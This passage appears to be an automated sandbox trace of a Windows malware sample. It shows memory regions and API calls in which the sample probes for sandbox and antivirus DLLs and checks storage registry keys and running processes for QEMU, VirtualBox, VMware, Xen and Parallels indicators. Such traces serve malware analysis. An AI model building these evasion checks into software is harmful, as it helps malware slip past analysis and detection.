1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2770 start_va = 0x410000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2771 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2772 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2773 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2774 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2786 start_va = 0x4c0000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2787 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2840 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2841 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2842 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2843 start_va = 0x4c0000 end_va = 0x57dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2844 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2845 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2846 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2847 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2848 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2849 start_va = 0x410000 end_va = 0x439fff monitored = 0 entry_point = 0x415680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2850 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2851 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2852 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3002 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3003 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3004 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 3005 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 3128 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3129 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3130 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3131 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3132 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3133 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3134 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3135 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3136 start_va = 0x420000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3137 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3138 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3139 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3140 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3141 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3142 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3143 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3144 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3319 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3320 start_va = 0x1db0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 3321 start_va = 0x1eb0000 end_va = 0x202afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3322 start_va = 0x2030000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 3622 start_va = 0x420000 end_va = 0x425fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3623 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 3624 start_va = 0x430000 end_va = 0x434fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3627 start_va = 0x460000 end_va = 0x475fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Thread: id = 155 os_tid = 0xcc4 [0170.150] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="kernel32" | out: DestinationString="kernel32") [0170.150] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76720000) returned 0x0 [0170.150] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="user32" | out: DestinationString="user32") [0170.150] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x743d0000) returned 0x0 [0180.986] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="advapi32" | out: DestinationString="advapi32") [0180.986] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76600000) returned 0x0 [0181.012] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="shell32" | out: DestinationString="shell32") [0181.012] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74eb0000) returned 0x0 [0185.759] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0185.760] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x580598 [0185.760] GetKeyboardLayoutList (in: nBuff=1, lpList=0x580598 | out: lpList=0x580598) returned 1 [0185.760] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb0c | out: TokenHandle=0x19fb0c*=0x150) returned 1 [0185.760] GetTokenInformation (in: TokenHandle=0x150, TokenInformationClass=0x19, TokenInformation=0x19fb10, TokenInformationLength=0x14, ReturnLength=0x19fb08 | out: TokenInformation=0x19fb10, ReturnLength=0x19fb08) returned 1 [0185.761] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x19fd4c, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0185.761] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0185.761] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0185.761] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1eb0000 [0185.763] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd50, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0185.764] wcsstr (_Str="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", _SubStr="7869.vmt") returned 0x0 [0185.764] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x19ff4c, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x19ff4c, ResultLength=0x0) returned 0x0 [0185.764] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19ff54, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ff54, ReturnLength=0x0) returned 0x0 [0185.764] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0185.764] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0185.764] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0185.764] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x588188 [0185.764] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0185.765] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0185.765] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x0) returned 0xc0000034 [0185.765] LocalFree (hMem=0x588188) returned 0x0 [0185.765] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x588188 [0185.765] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0185.765] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0185.765] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x15c) returned 0x0 [0185.765] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0185.765] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x589d98 [0185.765] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x589d98, Length=0x2c, ResultLength=0x19ff48 | out: KeyInformation=0x589d98, ResultLength=0x19ff48) returned 0x0 [0185.765] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0185.766] LocalAlloc (uFlags=0x40, uBytes=0x4e) returned 0x58a938 [0185.766] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x58a938, Length=0x4e, ResultLength=0x19ff48 | out: KeyInformation=0x58a938, ResultLength=0x19ff48) returned 0x0 [0185.766] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="qemu") returned 0x0 [0185.766] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="virtio") returned 0x0 [0185.766] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vmware") returned 0x0 [0185.766] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vbox") returned 0x0 [0185.766] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="xen") returned 0x0 [0185.767] LocalFree (hMem=0x58a938) returned 0x0 [0185.767] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0185.767] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x58a938 [0185.767] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x58a938, Length=0x44, ResultLength=0x19ff48 | out: KeyInformation=0x58a938, ResultLength=0x19ff48) returned 0x0 [0185.767] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="qemu") returned 0x0 [0185.767] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="virtio") returned 0x0 [0185.767] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vmware") returned 0x0 [0185.768] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vbox") returned 0x0 [0185.768] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="xen") returned 0x0 [0185.768] LocalFree (hMem=0x58a938) returned 0x0 [0185.768] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0185.768] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x58a938 [0185.768] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x58a938, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x58a938, ResultLength=0x19ff48) returned 0x0 [0185.769] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="qemu") returned 0x0 [0185.769] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="virtio") returned 0x0 [0185.769] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="vmware") returned 0x0 [0185.769] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="vbox") returned 0x0 [0185.769] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="xen") returned 0x0 [0185.769] LocalFree (hMem=0x58a938) returned 0x0 [0185.769] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0185.769] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x58a938 [0185.769] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x58a938, Length=0x50, ResultLength=0x19ff48 | out: KeyInformation=0x58a938, ResultLength=0x19ff48) returned 0x0 [0185.770] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="qemu") returned 0x0 [0185.770] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="virtio") returned 0x0 [0185.770] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vmware") returned 0x0 [0185.770] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vbox") returned 0x0 [0185.770] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="xen") returned 0x0 [0185.771] LocalFree (hMem=0x58a938) returned 0x0 [0185.771] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0185.771] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x58a938 [0185.771] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x58a938, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x58a938, ResultLength=0x19ff48) returned 0x0 [0185.772] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="qemu") returned 0x0 [0185.772] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="virtio") returned 0x0 [0185.772] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vmware") returned 0x0 [0185.772] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vbox") returned 0x0 [0185.772] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="xen") returned 0x0 [0185.772] LocalFree (hMem=0x58a938) returned 0x0 [0185.772] LocalFree (hMem=0x589d98) returned 0x0 [0185.772] NtClose (Handle=0x15c) returned 0x0 [0185.773] LocalFree (hMem=0x588188) returned 0x0 [0185.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x1b098) returned 0xc0000004 [0185.774] LocalAlloc (uFlags=0x40, uBytes=0x1c098) returned 0x1db2050 [0185.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1db2050, Length=0x1c098, ResultLength=0x19ff54 | out: SystemInformation=0x1db2050, ResultLength=0x19ff54*=0x14f68) returned 0x0 [0185.781] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0185.781] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0185.781] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0185.781] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0185.781] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0185.781] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0185.781] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0185.782] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.782] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0185.782] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0185.782] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.782] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.782] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.782] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.782] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.782] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0185.782] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0185.782] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.782] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.782] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.782] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.783] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.783] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0185.783] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0185.783] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.783] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.783] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.783] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.783] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.783] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0185.783] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0185.783] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.783] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.783] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.783] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.784] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.784] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0185.784] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0185.784] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.784] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.784] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.784] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.784] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.784] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0185.784] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0185.784] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.784] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.784] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.784] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.785] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.785] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0185.785] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0185.785] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.785] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.785] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.785] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.785] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.785] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0185.785] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0185.785] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.785] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.785] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.786] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.786] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.786] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0185.786] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0185.786] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.786] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.786] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.786] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.786] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0185.786] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0185.786] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0185.786] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0185.786] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0185.786] wcsstr 